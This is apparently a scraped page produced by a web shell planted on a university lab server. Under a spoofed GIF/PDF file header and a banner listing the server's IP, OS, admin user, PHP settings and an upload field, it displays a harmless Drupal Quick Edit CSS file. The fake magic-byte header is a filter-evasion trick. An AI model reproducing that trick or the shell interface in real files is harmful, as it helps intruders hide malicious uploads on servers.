GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/quickedit/css/ |
Upload File : |
/** * @file * Generic base styles for Quick Edit module. * * Note: every class is prefixed with "quickedit-" to prevent collisions with * modules or themes. In Edit module-specific DOM subtrees, this is not * necessary. */ /** * Editable. */ .quickedit-editable { z-index: 98; position: relative; cursor: pointer; } .quickedit-editable:focus { outline: none; } /** * Highlighted (hovered) editable. */ .quickedit-editable.quickedit-highlighted { z-index: 99; } .quickedit-validation-errors > .messages { margin-left: 0; margin-right: 0; } .quickedit-validation-errors > .messages > ul { list-style: none; margin: 0; padding: 0; } /** * In-place editors that don't use a popup. */ .quickedit-validation-errors { z-index: 300; position: relative; } .quickedit-validation-errors .messages.error { position: absolute; top: 6px; left: -5px; /* LTR */ margin: 0; border: none; } [dir="rtl"] .quickedit-validation-errors .messages.error { left: auto; right: -5px; } /** * Styling specific to the 'form' in-place editor. */ #quickedit_backstage { display: none; } .quickedit-form { position: absolute; z-index: 300; max-width: 35em; } .quickedit-form .placeholder { min-height: 22px; } /** * Default form styling overrides. */ .quickedit-form .form-wrapper .form-wrapper { margin: inherit; } .quickedit-form .form-actions { display: none; } .quickedit-form input { max-width: 100%; } /** * Entity toolbar. */ .quickedit-toolbar-container { max-width: 100%; position: absolute; max-width: 320px; width: 320px; z-index: 100; } .quickedit-toolbar-container > .quickedit-toolbar-pointer, .quickedit-toolbar-container > .quickedit-toolbar-lining { display: none; } .quickedit-form-container { position: relative; padding: 0; border: 0; margin: 0; vertical-align: baseline; z-index: 100; } .quickedit-toolgroup.ops { float: right; /* LTR */ } [dir="rtl"] .quickedit-toolgroup.ops { float: left; } .quickedit-toolbar-label { overflow: hidden; } #quickedit-toolbar-fence { bottom: 0; left: 0; right: 0; top: 0; position: fixed; z-index: -1; }